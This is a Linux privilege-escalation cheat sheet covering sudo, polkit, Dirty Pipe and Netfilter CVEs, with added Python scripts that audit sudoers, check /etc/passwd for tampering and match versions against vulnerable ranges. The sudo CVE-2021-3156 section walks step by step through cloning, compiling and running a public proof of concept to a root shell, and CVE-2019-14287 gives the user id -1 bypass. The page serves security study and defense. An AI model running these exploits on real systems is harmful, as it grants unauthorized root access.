Recent 0-Days

Sudo

The /etc/sudoers file specifies which users or groups are allowed to run specific programs and with what privileges.

$ sudo cat /etc/sudoers | grep -v "#" | sed -r '/^\s*$/d'

CVE-2021-3156

Affected versions (examples):

  • 1.8.31 - Ubuntu 20.04

  • 1.8.27 - Debian 10

  • 1.9.2 - Fedora 33

  1. Check sudo version

    $ sudo -V | head -n1
    
    Sudo version 1.8.31
  2. Download and compile the PoC

    $ git clone https://github.com/blasty/CVE-2021-3156.git
    $ cd CVE-2021-3156
    $ make
    
    rm -rf libnss_X
    mkdir libnss_X
    gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
    gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
  3. Check the exploit

    $ ./sudo-hax-me-a-sandwich
    
    ** CVE-2021-3156 PoC by blasty <peter@haxx.in>
    
      usage: ./sudo-hax-me-a-sandwich <target>
    
      available targets:
      ------------------------------------------------------------
        0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
        1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
        2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
      ------------------------------------------------------------
    
      manual mode:
        ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
  4. Check the OS Version so we know the <target>

    $ cat /etc/lsb-release
    
    DISTRIB_ID=Ubuntu
    DISTRIB_RELEASE=20.04
    DISTRIB_CODENAME=focal
    DISTRIB_DESCRIPTION="Ubuntu 20.04.1 LTS"
  5. Exploit

    $ ./sudo-hax-me-a-sandwich 1
    
    ** CVE-2021-3156 PoC by blasty <peter@haxx.in>
    
    using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
    ** pray for your rootshell.. **
    
    # id
    
    uid=0(root) gid=0(root) groups=0(root)

CVE-2019-14287

Affected Versions: < 1.8.28

Pre-requisites

  • The /etc/sudoers file must allow the user to execute a specific command; that command is the one that will end up running as root.

Sample Scenario

  1. Check sudo privileges

  2. Use user id -1 when executing sudo
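A defender's way to review the sudoers entries from the Sudo section programmatically, as an added example that is not part of the original page: it drops comment and blank lines (the same idea as the grep/sed pipeline above), parses each user specification into user, hosts, runas list, tags and commands, and flags the conditions worth attention for the two sudo CVEs: a runas list that uses an exclusion such as !root (the sudoers shape CVE-2019-14287 abused on sudo < 1.8.28, a detail from the sudo advisory rather than from this page), unrestricted command lists, and NOPASSWD entries. The sudoers content and the user names are constructed for the example.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sudoers content for the example (not taken from any real host).
SAMPLE_SUDOERS = """\
# /etc/sudoers
#
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL

alice   ALL=(ALL, !root) /bin/bash
bob     ALL=(ALL) NOPASSWD: /usr/bin/vim
carol   ALL=(root) /usr/bin/systemctl restart nginx
@includedir /etc/sudoers.d
"""


def strip_noise(text: str) -> List[str]:
    """Drop comment and blank lines. Like the page's grep this also discards legacy
    '#include' directives; unlike it, a '#' in the middle of a line is kept."""
    kept = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            kept.append(line)
    return kept


@dataclass
class UserSpec:
    user: str              # user, %group or User_Alias name
    hosts: str
    runas_users: List[str]
    runas_groups: List[str]
    tags: List[str]        # NOPASSWD, NOEXEC, SETENV, ...
    commands: str
    findings: List[str] = field(default_factory=list)


# Shape of a user specification:  user  hosts = (runas_users[:runas_groups]) [TAG:] commands
USER_SPEC = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("Defaults", "@include", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")


def parse_user_specs(lines: List[str]) -> List[UserSpec]:
    specs = []
    for line in lines:
        if line.startswith(SKIP_PREFIXES):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        runas = m.group("runas")
        if runas is None:                       # no (...) part means "run as root"
            runas_users, runas_groups = ["root"], []
        else:
            users_part, _, groups_part = runas.partition(":")
            runas_users = [u.strip() for u in users_part.split(",") if u.strip()]
            runas_groups = [g.strip() for g in groups_part.split(",") if g.strip()]
        cmds = m.group("cmds").strip()
        tags = []
        while True:                             # peel off leading TAG: markers
            t = re.match(r"([A-Z_]+):\s*", cmds)
            if not t:
                break
            tags.append(t.group(1))
            cmds = cmds[t.end():]
        specs.append(UserSpec(m.group("user"), m.group("hosts"), runas_users, runas_groups, tags, cmds))
    return specs


def audit(spec: UserSpec) -> UserSpec:
    if any(u.startswith("!") for u in spec.runas_users):
        spec.findings.append(
            "runas list uses an exclusion (e.g. !root): on sudo < 1.8.28 this was bypassable "
            "with user id -1 (CVE-2019-14287)")
    if spec.commands == "ALL":
        spec.findings.append("unrestricted command list (ALL)")
    if "NOPASSWD" in spec.tags:
        spec.findings.append("no password required (NOPASSWD)")
    return spec


def audit_sudoers(text: str) -> List[UserSpec]:
    return [audit(s) for s in parse_user_specs(strip_noise(text))]


if __name__ == "__main__":
    for s in audit_sudoers(SAMPLE_SUDOERS):
        status = "; ".join(s.findings) or "ok"
        print(f"{s.user:<8} runas={','.join(s.runas_users) or '-'} cmds={s.commands!r}: {status}")
```

Run it against a real file with the content of /etc/sudoers (and each file under /etc/sudoers.d, which the parser skips rather than follows) to get one line per entry with its findings. The flags are triage hints: an entry like alice's is only exploitable via CVE-2019-14287 on an unpatched sudo, but it is still a configuration that grants more than it appears to.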


Polkit

PolicyKit (polkit) is an authorization service on Linux-based operating systems: when user software asks a system component to perform a privileged action, the component asks polkit whether that software is authorized to do so, and only then carries out the request.

Polkit works with two groups of files.

  1. actions/policies (/usr/share/polkit-1/actions)

  2. rules (/usr/share/polkit-1/rules.d)

The most interesting functionality is pkexec, because it acts similarly to sudo.

CVE-2021-4034

  1. Download and compile the exploit

  2. Run the exploit


Dirty Pipe

CVE-2022-0847

Affected Kernel Versions: 5.8 - 5.17

  1. Download and compile the exploit

  2. We can use 2 exploits

    1. The first exploit version (exploit-1) modifies /etc/passwd and gives us a shell prompt with root privileges

      1. Verify kernel version

      2. Run exploit 1

    2. With the second exploit version (exploit-2), we can execute SUID binaries with root privileges.

      1. Find binaries with SUID set

      2. Run exploit 2 with the binary as the parameter
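The first Dirty Pipe variant above leaves its trace in /etc/passwd, so the check a defender runs afterwards is a passwd integrity audit. The following is an added example, not part of the original page or of any exploit repository: it parses /etc/passwd and flags entries whose password field holds a hash instead of the shadow placeholder, empty password fields, additional uid 0 accounts and malformed lines. Both sample files are constructed; the hash is a placeholder string, not a real one.

```python
from typing import List

# Constructed /etc/passwd samples (no real accounts). The hash is a placeholder.
CLEAN_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""

TAMPERED_PASSWD = """\
root:$6$PLACEHOLDER_HASH:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backdoor:x:0:0:root:/root:/bin/bash
ghost:x:0:0
"""

# Values that legitimately appear in the password field when the hash lives in /etc/shadow.
SHADOWED = {"x", "*", "!", "!!"}


def audit_passwd(text: str) -> List[str]:
    """Return one finding per suspicious /etc/passwd entry (empty list = nothing found)."""
    findings: List[str] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            # In-place overwrites that do not respect field boundaries show up here first.
            findings.append(f"line {lineno}: malformed entry with {len(fields)} fields: {raw!r}")
            continue
        name, password, uid, _gid, _gecos, _home, shell = fields
        if not uid.isdigit():
            findings.append(f"line {lineno}: non-numeric uid for {name!r}")
            continue
        if password == "":
            findings.append(f"line {lineno}: {name!r} has an empty password field (no password required)")
        elif password not in SHADOWED:
            findings.append(f"line {lineno}: {name!r} carries a password hash in /etc/passwd instead of /etc/shadow")
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: extra uid 0 account {name!r} with shell {shell!r}")
    return findings


if __name__ == "__main__":
    import sys
    # Pass a path to audit a real file; without one the constructed tampered sample is used.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path).read() if path else TAMPERED_PASSWD
    for finding in audit_passwd(text):
        print(finding)
```

Because what an exploit writes into the file varies from tool to tool, these checks are generic; pair them with a file-integrity baseline (a known-good copy, or the package manager's verification of /etc) and with the kernel version check from step 1, since a patched kernel makes the whole class moot.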


Netfilter

Netfilter is a Linux kernel module that provides, among other things, packet filtering, network address translation, and other tools relevant to firewalls.

This kernel module has three main functions:

  1. Packet defragmentation

  2. Connection tracking

  3. Network address translation (NAT)

When the module is activated, all IP packets are checked by Netfilter before they are forwarded to the target application on the local or a remote system. In 2021 (CVE-2021-22555), 2022 (CVE-2022-1015), and also in 2023 (CVE-2023-32233), several vulnerabilities were found that could lead to privilege escalation.

CVE-2021-22555

Vulnerable Kernel Versions: 2.6 - 5.11

CVE-2022-25636

Vulnerable Kernel Versions: 5.4 through 5.6.10

CVE-2023-32233

Vulnerable Kernel Versions: up to version 6.3.1
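The version checks scattered through this page (sudo -V in the Sudo section, the kernel version for Dirty Pipe and the Netfilter CVEs) become a repeatable triage script in the following added example, which is not part of the original page. It parses the first line of sudo -V and the output of uname -r into comparable version tuples and matches them against the ranges stated on this page; for CVE-2021-3156 it uses the full affected ranges from the sudo advisory (1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1), since the page only illustrates that CVE with three example versions. The uname -r sample value is constructed.

```python
import re
import subprocess
from typing import List, Tuple

Range = Tuple[str, str]   # inclusive (low, high) version bounds

# Sudo ranges. CVE-2021-3156 bounds come from the sudo advisory (the page only lists
# 1.8.31 / 1.8.27 / 1.9.2 as examples); CVE-2019-14287 is "< 1.8.28" on the page.
SUDO_RULES: List[Tuple[str, List[Range]]] = [
    ("CVE-2021-3156", [("1.8.2", "1.8.31p2"), ("1.9.0", "1.9.5p1")]),
    ("CVE-2019-14287", [("0", "1.8.27")]),
]
# Kernel ranges exactly as stated on this page.
KERNEL_RULES: List[Tuple[str, List[Range]]] = [
    ("CVE-2022-0847 (Dirty Pipe)", [("5.8", "5.17")]),
    ("CVE-2021-22555", [("2.6", "5.11")]),
    ("CVE-2022-25636", [("5.4", "5.6.10")]),
    ("CVE-2023-32233", [("0", "6.3.1")]),
]


def parse_version(text: str) -> List[int]:
    """'1.8.31p2' -> [1, 8, 31, 2]; '5.13.0-52-generic' -> [5, 13, 0]; '6.3.1' -> [6, 3, 1].
    Dotted numeric components are kept, a sudo 'pN' patch level becomes one more
    component, and anything after that (distro suffixes) is ignored."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)(?:p(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    parts = [int(x) for x in m.group(1).split(".")]
    if m.group(2) is not None:
        parts.append(int(m.group(2)))
    return parts


def _pad(v: List[int], n: int, fill: int = 0) -> Tuple[int, ...]:
    return tuple(v + [fill] * (n - len(v)))


def in_range(v: List[int], low: str, high: str) -> bool:
    """Inclusive check. A short upper bound such as '5.17' covers every 5.17.x release,
    so the missing components of `high` are padded with a large sentinel."""
    lo, hi = parse_version(low), parse_version(high)
    n = max(len(v), len(lo), len(hi))
    return _pad(lo, n) <= _pad(v, n) <= _pad(hi, n, fill=10**6)


def sudo_version_from_banner(banner: str) -> List[int]:
    """Take the first line of `sudo -V`, e.g. 'Sudo version 1.8.31'."""
    m = re.search(r"Sudo version\s+(\S+)", banner)
    if not m:
        raise ValueError(f"not a sudo -V banner: {banner!r}")
    return parse_version(m.group(1))


def match_rules(v: List[int], rules: List[Tuple[str, List[Range]]]) -> List[str]:
    return [cve for cve, ranges in rules if any(in_range(v, lo, hi) for lo, hi in ranges)]


def triage(sudo_banner: str, uname_r: str) -> dict:
    return {
        "sudo": match_rules(sudo_version_from_banner(sudo_banner), SUDO_RULES),
        "kernel": match_rules(parse_version(uname_r), KERNEL_RULES),
    }


def _run(cmd: List[str], fallback: str) -> str:
    """Read a live value from the command; fall back to the constructed sample if it cannot run."""
    try:
        return subprocess.run(cmd, capture_output=True, text=True, timeout=5).stdout.splitlines()[0]
    except (OSError, subprocess.SubprocessError, IndexError):
        return fallback


if __name__ == "__main__":
    # Constructed sample values, used when the commands are unavailable here.
    banner = _run(["sudo", "-V"], "Sudo version 1.8.31")
    kernel = _run(["uname", "-r"], "5.13.0-52-generic")
    for component, hits in triage(banner, kernel).items():
        print(f"{component}: {', '.join(hits) if hits else 'no listed CVE range matched'}")
```

A match is a triage hint, not proof of exploitability: distributions backport fixes without changing the upstream version string (Ubuntu 20.04 kept the 1.8.31 version string after patching CVE-2021-3156), and the kernel ranges on this page are coarse. Confirm a hit against the package changelog or the distribution's security tracker before acting on it.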
